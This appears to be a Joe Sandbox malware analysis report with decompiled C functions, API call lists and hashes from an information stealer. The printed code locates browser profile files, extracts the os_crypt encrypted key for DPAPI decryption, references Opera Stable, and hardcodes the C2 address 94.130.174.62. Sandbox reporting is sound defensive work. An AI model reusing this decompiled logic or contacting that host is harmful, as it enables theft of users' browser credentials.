                                                                                				if(E0040C664(_t115 - 0x2c, "AppData\\Local", 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449e7c, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449ed8, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449d5c, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449dd0, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449c20, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449b90, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449c5c, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449f04, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				E00402C34(_t115 - 0x2c, 1, 0);
                                                                                				E00402C34(_t115 + 8, 1, 0);
                                                                                				return E00421A61(_t106, 0, _t114);
                                                                                			}










                                                                                0x00409245
                                                                                0x00409245
                                                                                0x0040924c
                                                                                0x00409257
                                                                                0x0040925a
                                                                                0x0040925d
                                                                                0x0040925f
                                                                                0x0040926d
                                                                                0x00409272
                                                                                0x00409277
                                                                                0x00409279
                                                                                0x00409279
                                                                                0x0040928b
                                                                                0x0040928d
                                                                                0x0040928d
                                                                                0x0040929f
                                                                                0x004092a1
                                                                                0x004092a1
                                                                                0x004092b4
                                                                                0x004092b6
                                                                                0x004092b6
                                                                                0x004092c9
                                                                                0x004092cb
                                                                                0x004092cb
                                                                                0x004092de
                                                                                0x004092e0
                                                                                0x004092e0
                                                                                0x004092f3
                                                                                0x004092f5
                                                                                0x004092f5
                                                                                0x00409308
                                                                                0x0040930a
                                                                                0x0040930a
                                                                                0x0040931d
                                                                                0x0040931f
                                                                                0x0040931f
                                                                                0x00409332
                                                                                0x00409334
                                                                                0x00409334
                                                                                0x00409347
                                                                                0x00409349
                                                                                0x00409349
                                                                                0x00409351
                                                                                0x00409356
                                                                                0x00409358
                                                                                0x00409358
                                                                                0x00409371
                                                                                0x00409373
                                                                                0x00409373
                                                                                0x00409386
                                                                                0x00409388
                                                                                0x00409388
                                                                                0x0040939b
                                                                                0x0040939d
                                                                                0x0040939d
                                                                                0x004093b0
                                                                                0x004093b2
                                                                                0x004093b2
                                                                                0x004093c5
                                                                                0x004093c7
                                                                                0x004093c7
                                                                                0x004093da
                                                                                0x004093dc
                                                                                0x004093dc
                                                                                0x004093ef
                                                                                0x004093f1
                                                                                0x004093f1
                                                                                0x00409404
                                                                                0x00409406
                                                                                0x00409406
                                                                                0x00409419
                                                                                0x0040941b
                                                                                0x0040941b
                                                                                0x0040942d
                                                                                0x0040942f
                                                                                0x0040942f
                                                                                0x00409441
                                                                                0x00409443
                                                                                0x00409443
                                                                                0x00409456
                                                                                0x00409458
                                                                                0x00409458
                                                                                0x0040946b
                                                                                0x0040946d
                                                                                0x0040946d
                                                                                0x00409480
                                                                                0x00409482
                                                                                0x00409482
                                                                                0x00409495
                                                                                0x00409497
                                                                                0x00409497
                                                                                0x004094aa
                                                                                0x004094ac
                                                                                0x004094ac
                                                                                0x004094bf
                                                                                0x004094c1
                                                                                0x004094c1
                                                                                0x004094d4
                                                                                0x004094d6
                                                                                0x004094d6
                                                                                0x004094e9
                                                                                0x004094eb
                                                                                0x004094eb
                                                                                0x004094f2
                                                                                0x004094fd
                                                                                0x00409509

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog3_
                                                                                • String ID: AppData\Local$AppData\Roaming$C:\Windows\$C:\\Windows\$C:\\\Windows\
                                                                                • API String ID: 2427045233-1670818868
                                                                                • Opcode ID: 17c1783ad909d7d4de27cd7c22ead3794264c99a121d792d10185f3baeae4ec0
                                                                                • Instruction ID: 93343bef8a62e846269ffe94059040ae1205e855e75dfee06ea45578d30c96a3
                                                                                • Opcode Fuzzy Hash: 17c1783ad909d7d4de27cd7c22ead3794264c99a121d792d10185f3baeae4ec0
                                                                                • Instruction Fuzzy Hash: B681407490024DAADF31EBB58CC5CAF7A7CE689F08714993BF111F2192CA39DC459B68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                • String ID:
                                                                                • API String ID: 3886058894-0
                                                                                • Opcode ID: 0b27fdbf409fc5229161f09896af985b0d0c712f297d7939eeedf512bcbe9c38
                                                                                • Instruction ID: 817335c902bd3c367d99a871cc26fa2e4d375b97754140bf5d796d816cab7eb9
                                                                                • Opcode Fuzzy Hash: 0b27fdbf409fc5229161f09896af985b0d0c712f297d7939eeedf512bcbe9c38
                                                                                • Instruction Fuzzy Hash: B951E371A00605EBCB209F6E884599EBBB5EF41360F28C229FC7C97191E7709F51EB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 86%
                                                                                			E0040F7A2(void* __ebx, intOrPtr __ecx, char* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t50;
                                                                                				void* _t68;
                                                                                				char* _t74;
                                                                                				void* _t78;
                                                                                				void* _t82;
                                                                                
                                                                                				_t79 = __edi;
                                                                                				_push(0x38);
                                                                                				E004219DE(E00435FE4, __ebx, __edi, __esi);
                                                                                				 *(_t82 - 0x38) =  *(_t82 - 0x38) & 0x00000000;
                                                                                				 *((intOrPtr*)(_t82 - 0x40)) = __ecx;
                                                                                				_t81 = _t82 - 0x30;
                                                                                				_t61 = _t82 - 0x34;
                                                                                				 *((intOrPtr*)(_t82 - 0x44)) =  *((intOrPtr*)(_t82 + 0xc));
                                                                                				if(E0040F5B8(_t82 - 0x34, _t82 - 0x30,  *((intOrPtr*)(_t82 + 8))) == 0) {
                                                                                					L19:
                                                                                					return E00421A61(_t61, _t79, _t81);
                                                                                				}
                                                                                				_t61 = 0;
                                                                                				if( *((intOrPtr*)(_t82 - 0x34)) == 0) {
                                                                                					goto L19;
                                                                                				}
                                                                                				_t81 =  *(_t82 - 0x30);
                                                                                				if(_t81 == 0) {
                                                                                					goto L19;
                                                                                				}
                                                                                				_t79 = LocalAlloc(0x40, _t81 + 1);
                                                                                				if(_t79 == 0) {
                                                                                					goto L19;
                                                                                				}
                                                                                				if(_t81 <= 0) {
                                                                                					L7:
                                                                                					if(StrStrA(_t79, "\"os_crypt\":{\"encrypted_key\":\"") == _t61) {
                                                                                						goto L19;
                                                                                					}
                                                                                					_t65 = _t82 - 0x2c;
                                                                                					 *((intOrPtr*)(_t82 - 0x18)) = 0xf;
                                                                                					 *((intOrPtr*)(_t82 - 0x1c)) = _t61;
                                                                                					 *((char*)(_t82 - 0x2c)) = _t61;
                                                                                					E0040381A(_t82 - 0x2c, _t45 + 0x1d);
                                                                                					 *((intOrPtr*)(_t82 - 4)) = _t61;
                                                                                					if(E0040C664(_t82 - 0x2c, "\"}", _t61) != 0xffffffff) {
                                                                                						_t65 = _t82 - 0x2c;
                                                                                						E00403EAE(_t82 - 0x2c, _t49, 0xffffffff);
                                                                                					}
                                                                                					_t50 =  *((intOrPtr*)(_t82 - 0x2c));
                                                                                					if( *((intOrPtr*)(_t82 - 0x18)) < 0x10) {
                                                                                						_t50 = _t82 - 0x2c;
                                                                                					}
                                                                                					_t79 = _t82 - 0x3c;
                                                                                					_t61 = _t82 - 0x30;
                                                                                					if(E0040F64C(_t82 - 0x30, _t65, _t82 - 0x3c, _t50) != 0) {
                                                                                						_t75 =  *(_t82 - 0x3c);
                                                                                						_t68 = 5;
                                                                                						if( *(_t82 - 0x3c) >= _t68) {
                                                                                							_t53 =  *(_t82 - 0x30);
                                                                                							_t79 = 0x43f1d4;
                                                                                							_t81 =  *(_t82 - 0x30);
                                                                                							_t61 = 0;
                                                                                							asm("repe cmpsb");
                                                                                							if(0 == 0) {
                                                                                								_t79 = _t82 - 0x30;
                                                                                								if(E0040F6A5(_t53 + 5, _t82 - 0x30, _t75 + 0xfffffffb, _t82 - 0x34) != 0 &&  *(_t82 - 0x30) == 0x20) {
                                                                                									 *(_t82 - 0x38) = 1;
                                                                                									E0040F738( *((intOrPtr*)(_t82 - 0x44)),  *((intOrPtr*)(_t82 - 0x40)),  *((intOrPtr*)(_t82 - 0x34)));
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					E00402C34(_t82 - 0x2c, 1, 0);
                                                                                					goto L19;
                                                                                				} else {
                                                                                					_t74 = _t79;
                                                                                					_t78 =  *((intOrPtr*)(_t82 - 0x34)) - _t79;
                                                                                					do {
                                                                                						 *_t74 =  *((intOrPtr*)(_t78 + _t74));
                                                                                						_t74 =  &(_t74[1]);
                                                                                						_t81 = _t81 - 1;
                                                                                					} while (_t81 != 0);
                                                                                					goto L7;
                                                                                				}
                                                                                			}








                                                                                0x0040f7a2
                                                                                0x0040f7a2
                                                                                0x0040f7a9
                                                                                0x0040f7b1
                                                                                0x0040f7b5
                                                                                0x0040f7bc
                                                                                0x0040f7bf
                                                                                0x0040f7c2
                                                                                0x0040f7cd
                                                                                0x0040f8da
                                                                                0x0040f8e2
                                                                                0x0040f8e2
                                                                                0x0040f7d3
                                                                                0x0040f7d8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040f7de
                                                                                0x0040f7e3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040f7f5
                                                                                0x0040f7f9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040f801
                                                                                0x0040f813
                                                                                0x0040f821
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040f82b
                                                                                0x0040f82e
                                                                                0x0040f835
                                                                                0x0040f838
                                                                                0x0040f83b
                                                                                0x0040f84a
                                                                                0x0040f855
                                                                                0x0040f85a
                                                                                0x0040f85d
                                                                                0x0040f85d
                                                                                0x0040f866
                                                                                0x0040f869
                                                                                0x0040f86b
                                                                                0x0040f86b
                                                                                0x0040f86f
                                                                                0x0040f872
                                                                                0x0040f87d
                                                                                0x0040f87f
                                                                                0x0040f884
                                                                                0x0040f887
                                                                                0x0040f889
                                                                                0x0040f88c
                                                                                0x0040f891
                                                                                0x0040f893
                                                                                0x0040f895
                                                                                0x0040f897
                                                                                0x0040f8a4
                                                                                0x0040f8b0
                                                                                0x0040f8c1
                                                                                0x0040f8c8
                                                                                0x0040f8cd
                                                                                0x0040f8b0
                                                                                0x0040f897
                                                                                0x0040f887
                                                                                0x0040f8d5
                                                                                0x00000000
                                                                                0x0040f803
                                                                                0x0040f806
                                                                                0x0040f808
                                                                                0x0040f80a
                                                                                0x0040f80d
                                                                                0x0040f80f
                                                                                0x0040f810
                                                                                0x0040f810
                                                                                0x00000000
                                                                                0x0040f80a

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 0040F7A9
                                                                                  • Part of subcall function 0040F5B8: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 0040F5D3
                                                                                  • Part of subcall function 0040F5B8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00414013,?,\Opera Stable\), ref: 0040F5EA
                                                                                  • Part of subcall function 0040F5B8: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,00414013,?,\Opera Stable\), ref: 0040F601
                                                                                  • Part of subcall function 0040F5B8: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040F618
                                                                                  • Part of subcall function 0040F5B8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00414013,?,\Opera Stable\), ref: 0040F640
                                                                                • LocalAlloc.KERNEL32(00000040,?,00000038,00413BCE,?,?,00000001,00000000,00000001), ref: 0040F7EF
                                                                                • StrStrA.SHLWAPI(00000000,"os_crypt":{"encrypted_key":"), ref: 0040F819
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AllocLocal$CloseCreateH_prolog3_HandleReadSize
                                                                                • String ID: $"os_crypt":{"encrypted_key":"$DPAPI
                                                                                • API String ID: 128017991-2919755482
                                                                                • Opcode ID: 9b3d1918e5bfc1227503d4b8e889a7d3d74695d4ccf852f30a8429478e5e5886
                                                                                • Instruction ID: f3c89960bbd430be3fba1748302675d9ab0947717eec4addc5a01aa19b62930b
                                                                                • Opcode Fuzzy Hash: 9b3d1918e5bfc1227503d4b8e889a7d3d74695d4ccf852f30a8429478e5e5886
                                                                                • Instruction Fuzzy Hash: 09416C32D00209ABDF24EFA5D881ADEB7B5AF44310F60813BF511B76D1DB78594ACB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E0040A83E(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t41;
                                                                                				intOrPtr _t44;
                                                                                				intOrPtr _t51;
                                                                                				int _t55;
                                                                                				intOrPtr _t59;
                                                                                				void* _t63;
                                                                                				void* _t72;
                                                                                				void* _t81;
                                                                                				void* _t82;
                                                                                				void* _t85;
                                                                                
                                                                                				_t85 = __eflags;
                                                                                				_t63 = __ecx;
                                                                                				_push(0x48);
                                                                                				E004219DE(E004367DD, __ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t81 - 0x50)) =  *((intOrPtr*)(_t81 + 0x40));
                                                                                				 *((intOrPtr*)(_t81 - 4)) = 0;
                                                                                				 *((intOrPtr*)(_t81 - 0x18)) = 0xf;
                                                                                				 *((intOrPtr*)(_t81 - 0x1c)) = 0;
                                                                                				 *((char*)(_t81 - 0x2c)) = 0;
                                                                                				_push(1);
                                                                                				_t83 = _t82 - 0x1c;
                                                                                				 *((intOrPtr*)(_t81 - 0x54)) = _t82 - 0x1c;
                                                                                				 *((char*)(_t81 - 4)) = 2;
                                                                                				 *(_t81 - 0x4c) = 0;
                                                                                				E0040410F(_t83, _t81 + 0x24);
                                                                                				_push(_t81 - 0x48);
                                                                                				_t41 = E0040A0C4(0, _t63, __edi, _t83, _t85);
                                                                                				 *((char*)(_t81 - 4)) = 3;
                                                                                				E0040CFB8(_t81 - 0x2c, _t41);
                                                                                				_t64 = _t81 - 0x48;
                                                                                				 *((char*)(_t81 - 4)) = 2;
                                                                                				E00402C34(_t81 - 0x48, 1, 0);
                                                                                				_t44 =  *((intOrPtr*)(_t81 - 0x2c));
                                                                                				if( *((intOrPtr*)(_t81 - 0x18)) < 0x10) {
                                                                                					_t44 = _t81 - 0x2c;
                                                                                				}
                                                                                				_t80 = "ERROR";
                                                                                				_push("ERROR");
                                                                                				_push(_t44);
                                                                                				if( *0x44a1d8() == 0) {
                                                                                					_t65 = "94.130.174.62";
                                                                                					goto L12;
                                                                                				} else {
                                                                                					_t51 =  *((intOrPtr*)(_t81 + 8));
                                                                                					if( *((intOrPtr*)(_t81 + 0x1c)) < 0x10) {
                                                                                						_t51 = _t81 + 8;
                                                                                					}
                                                                                					if(E0040CFFC(0, _t64, _t81 - 0x2c, _t51,  *((intOrPtr*)(_t81 + 0x18))) != 0xffffffff) {
                                                                                						E00403EAE(_t81 - 0x2c, 0, _t54 + 6);
                                                                                						_t90 =  *((intOrPtr*)(_t81 - 0x18)) - 0x10;
                                                                                						_t59 =  *((intOrPtr*)(_t81 - 0x2c));
                                                                                						if( *((intOrPtr*)(_t81 - 0x18)) < 0x10) {
                                                                                							_t59 = _t81 - 0x2c;
                                                                                						}
                                                                                						 *(_t81 - 0x4c) = E0041F4CD(_t72, _t90, _t59,  *((intOrPtr*)(_t81 - 0x50)));
                                                                                					}
                                                                                					_t55 = lstrlenA( *(_t81 - 0x4c));
                                                                                					_t65 = "94.130.174.62";
                                                                                					if(_t55 < 1) {
                                                                                						L12:
                                                                                						E00403A16(_t65, __eflags, _t80, 5);
                                                                                					} else {
                                                                                						E0040381A("94.130.174.62",  *(_t81 - 0x4c));
                                                                                					}
                                                                                				}
                                                                                				E00402C34(_t81 - 0x2c, 1, 0);
                                                                                				E00402C34(_t81 + 8, 1, 0);
                                                                                				E00402C34(_t81 + 0x24, 1, 0);
                                                                                				return E00421A61(0, 1, _t80);
                                                                                			}













                                                                                0x0040a83e
                                                                                0x0040a83e
                                                                                0x0040a83e
                                                                                0x0040a845
                                                                                0x0040a84d
                                                                                0x0040a852
                                                                                0x0040a855
                                                                                0x0040a85c
                                                                                0x0040a85f
                                                                                0x0040a862
                                                                                0x0040a864
                                                                                0x0040a86c
                                                                                0x0040a870
                                                                                0x0040a874
                                                                                0x0040a877
                                                                                0x0040a87f
                                                                                0x0040a880
                                                                                0x0040a88d
                                                                                0x0040a891
                                                                                0x0040a89b
                                                                                0x0040a89e
                                                                                0x0040a8a2
                                                                                0x0040a8ab
                                                                                0x0040a8ae
                                                                                0x0040a8b0
                                                                                0x0040a8b0
                                                                                0x0040a8b3
                                                                                0x0040a8b8
                                                                                0x0040a8b9
                                                                                0x0040a8c2
                                                                                0x0040a927
                                                                                0x00000000
                                                                                0x0040a8c4
                                                                                0x0040a8c8
                                                                                0x0040a8cb
                                                                                0x0040a8cd
                                                                                0x0040a8cd
                                                                                0x0040a8e2
                                                                                0x0040a8ec
                                                                                0x0040a8f1
                                                                                0x0040a8f5
                                                                                0x0040a8f8
                                                                                0x0040a8fa
                                                                                0x0040a8fa
                                                                                0x0040a908
                                                                                0x0040a908
                                                                                0x0040a90e
                                                                                0x0040a914
                                                                                0x0040a91b
                                                                                0x0040a92c
                                                                                0x0040a92f
                                                                                0x0040a91d
                                                                                0x0040a920
                                                                                0x0040a920
                                                                                0x0040a91b
                                                                                0x0040a939
                                                                                0x0040a943
                                                                                0x0040a94d
                                                                                0x0040a957

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 0040A845
                                                                                  • Part of subcall function 0040A0C4: __EH_prolog3.LIBCMT ref: 0040A0E3
                                                                                  • Part of subcall function 0040CFB8: _memmove.LIBCMT ref: 0040CFD4
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                • StrCmpCA.SHLWAPI(?,ERROR,00000001,00000000), ref: 0040A8BA
                                                                                • _strtok.LIBCMT ref: 0040A901
                                                                                • lstrlenA.KERNEL32(?,?,?,00000010), ref: 0040A90E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memmove$H_prolog3H_prolog3__strtoklstrlen
                                                                                • String ID: 94.130.174.62$ERROR
                                                                                • API String ID: 3318954604-1872593727
                                                                                • Opcode ID: 6376aa1cdf51434db7c576cd6c961b7dd533c1df4c77a4f66db3e87ea8053bad
                                                                                • Instruction ID: 7184f00bf7badb2b699323761a46ef489fbcf5f22195b9144c2b7f79197de20c
                                                                                • Opcode Fuzzy Hash: 6376aa1cdf51434db7c576cd6c961b7dd533c1df4c77a4f66db3e87ea8053bad
                                                                                • Instruction Fuzzy Hash: DD3160B2D002089ADF14EFA9C8459DE7BB8AF54308F50842FF511B7181D7785A55CB6A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E00424C1E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t48;
                                                                                				intOrPtr* _t49;
                                                                                				struct _CRITICAL_SECTION* _t50;
                                                                                				intOrPtr _t51;
                                                                                				struct _CRITICAL_SECTION* _t54;
                                                                                				intOrPtr _t55;
                                                                                				struct _CRITICAL_SECTION* _t57;
                                                                                				intOrPtr _t58;
                                                                                				intOrPtr _t60;
                                                                                				signed int _t62;
                                                                                				intOrPtr _t64;
                                                                                				intOrPtr _t66;
                                                                                				struct _CRITICAL_SECTION* _t67;
                                                                                				intOrPtr _t75;
                                                                                				void* _t82;
                                                                                				struct _CRITICAL_SECTION* _t84;
                                                                                				signed int _t86;
                                                                                				void* _t87;
                                                                                
                                                                                				_t82 = __edx;
                                                                                				_push(0x10);
                                                                                				_push(0x443e28);
                                                                                				E00424400(__ebx, __edi, __esi);
                                                                                				_t84 = 0;
                                                                                				 *(_t87 - 0x1c) = 0;
                                                                                				E00429078(1);
                                                                                				 *((intOrPtr*)(_t87 - 4)) = 0;
                                                                                				_t86 = 0;
                                                                                				while(1) {
                                                                                					 *(_t87 - 0x20) = _t86;
                                                                                					if(_t86 >=  *0x44bdc0) {
                                                                                						break;
                                                                                					}
                                                                                					_t48 =  *0x44ada0; // 0x37b21b8
                                                                                					_t49 = _t48 + _t86 * 4;
                                                                                					if( *_t49 == 0) {
                                                                                						_t50 = E00422FFA(0x38);
                                                                                						_t75 =  *0x44ada0; // 0x37b21b8
                                                                                						 *(_t75 + _t86 * 4) = _t50;
                                                                                						__eflags = _t50;
                                                                                						if(_t50 != 0) {
                                                                                							_t51 =  *0x44ada0; // 0x37b21b8
                                                                                							_t54 = InitializeCriticalSectionAndSpinCount( *((intOrPtr*)(_t51 + _t86 * 4)) + 0x20, 0xfa0);
                                                                                							__eflags = _t54;
                                                                                							_t55 =  *0x44ada0; // 0x37b21b8
                                                                                							if(_t54 != 0) {
                                                                                								_t57 =  *((intOrPtr*)(_t55 + _t86 * 4)) + 0x20;
                                                                                								__eflags = _t57;
                                                                                								EnterCriticalSection(_t57);
                                                                                								_t58 =  *0x44ada0; // 0x37b21b8
                                                                                								_t84 =  *(_t58 + _t86 * 4);
                                                                                								 *(_t87 - 0x1c) = _t84;
                                                                                								 *(_t84 + 0xc) = 0;
                                                                                							} else {
                                                                                								E0041E008( *((intOrPtr*)(_t55 + _t86 * 4)));
                                                                                								_t60 =  *0x44ada0; // 0x37b21b8
                                                                                								 *((intOrPtr*)(_t60 + _t86 * 4)) = 0;
                                                                                							}
                                                                                						}
                                                                                						break;
                                                                                					}
                                                                                					_t6 =  *_t49 + 0xc; // 0x101
                                                                                					_t62 =  *_t6;
                                                                                					if((_t62 & 0x00000083) != 0 || (_t62 & 0x00008000) != 0) {
                                                                                						L9:
                                                                                						_t86 = _t86 + 1;
                                                                                						continue;
                                                                                					} else {
                                                                                						_t11 = _t86 - 3; // -3
                                                                                						_t94 = _t11 - 0x10;
                                                                                						if(_t11 > 0x10) {
                                                                                							L7:
                                                                                							_t64 =  *0x44ada0; // 0x37b21b8
                                                                                							E0041F923(_t86,  *((intOrPtr*)(_t64 + _t86 * 4)));
                                                                                							_t66 =  *0x44ada0; // 0x37b21b8
                                                                                							_t67 =  *(_t66 + _t86 * 4);
                                                                                							if(( *(_t67 + 0xc) & 0x00000083) == 0) {
                                                                                								_t84 = _t67;
                                                                                								 *(_t87 - 0x1c) = _t84;
                                                                                								break;
                                                                                							} else {
                                                                                								E0041F991(_t86, _t67);
                                                                                								goto L9;
                                                                                							}
                                                                                						}
                                                                                						_t12 = _t86 + 0x10; // 0x10
                                                                                						if(E00428FB6(0, _t82, _t84, _t86, _t94) == 0) {
                                                                                							break;
                                                                                						}
                                                                                						goto L7;
                                                                                					}
                                                                                				}
                                                                                				__eflags = _t84;
                                                                                				if(_t84 != 0) {
                                                                                					 *(_t84 + 0xc) =  *(_t84 + 0xc) & 0x00008000;
                                                                                					 *((intOrPtr*)(_t84 + 4)) = 0;
                                                                                					 *((intOrPtr*)(_t84 + 8)) = 0;
                                                                                					 *_t84 = 0;
                                                                                					 *((intOrPtr*)(_t84 + 0x1c)) = 0;
                                                                                					_t40 = _t84 + 0x10;
                                                                                					 *_t40 =  *(_t84 + 0x10) | 0xffffffff;
                                                                                					__eflags =  *_t40;
                                                                                				}
                                                                                				 *((intOrPtr*)(_t87 - 4)) = 0xfffffffe;
                                                                                				E00424D48();
                                                                                				return E00424445(_t84);
                                                                                			}





















                                                                                0x00424c1e
                                                                                0x00424c1e
                                                                                0x00424c20
                                                                                0x00424c25
                                                                                0x00424c2c
                                                                                0x00424c2e
                                                                                0x00424c33
                                                                                0x00424c39
                                                                                0x00424c3c
                                                                                0x00424c3e
                                                                                0x00424c3e
                                                                                0x00424c47
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00424c4d
                                                                                0x00424c52
                                                                                0x00424c57
                                                                                0x00424cb6
                                                                                0x00424cbc
                                                                                0x00424cc2
                                                                                0x00424cc5
                                                                                0x00424cc7
                                                                                0x00424cce
                                                                                0x00424cda
                                                                                0x00424ce0
                                                                                0x00424ce2
                                                                                0x00424ce7
                                                                                0x00424cff
                                                                                0x00424cff
                                                                                0x00424d03
                                                                                0x00424d09
                                                                                0x00424d0e
                                                                                0x00424d11
                                                                                0x00424d14
                                                                                0x00424ce9
                                                                                0x00424cec
                                                                                0x00424cf2
                                                                                0x00424cf7
                                                                                0x00424cf7
                                                                                0x00424ce7
                                                                                0x00000000
                                                                                0x00424cc7
                                                                                0x00424c5b
                                                                                0x00424c5b
                                                                                0x00424c60
                                                                                0x00424caa
                                                                                0x00424caa
                                                                                0x00000000
                                                                                0x00424c69
                                                                                0x00424c69
                                                                                0x00424c6c
                                                                                0x00424c6f
                                                                                0x00424c83
                                                                                0x00424c83
                                                                                0x00424c8c
                                                                                0x00424c93
                                                                                0x00424c98
                                                                                0x00424c9f
                                                                                0x00424cad
                                                                                0x00424caf
                                                                                0x00000000
                                                                                0x00424ca1
                                                                                0x00424ca3
                                                                                0x00000000
                                                                                0x00424ca9
                                                                                0x00424c9f
                                                                                0x00424c71
                                                                                0x00424c7d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00424c7d
                                                                                0x00424c60
                                                                                0x00424d17
                                                                                0x00424d19
                                                                                0x00424d1b
                                                                                0x00424d22
                                                                                0x00424d25
                                                                                0x00424d28
                                                                                0x00424d2a
                                                                                0x00424d2d
                                                                                0x00424d2d
                                                                                0x00424d2d
                                                                                0x00424d2d
                                                                                0x00424d31
                                                                                0x00424d38
                                                                                0x00424d44

                                                                                APIs
                                                                                  • Part of subcall function 00429078: __mtinitlocknum.LIBCMT ref: 0042908E
                                                                                  • Part of subcall function 00429078: __amsg_exit.LIBCMT ref: 0042909A
                                                                                  • Part of subcall function 00429078: EnterCriticalSection.KERNEL32(?,?,?,00427A83,0000000D), ref: 004290A2
                                                                                • __mtinitlocknum.LIBCMT ref: 00424C75
                                                                                • __malloc_crt.LIBCMT ref: 00424CB6
                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(004471C0,00000FA0,00443E28,00000010,00420295,00443B68,0000000C,00420312,0044858C,?,00000040,?,00413F80,00441460,?,?), ref: 00424CDA
                                                                                • _free.LIBCMT ref: 00424CEC
                                                                                • EnterCriticalSection.KERNEL32(004471C0), ref: 00424D03
                                                                                Strings
                                                                                Memory Dump Source
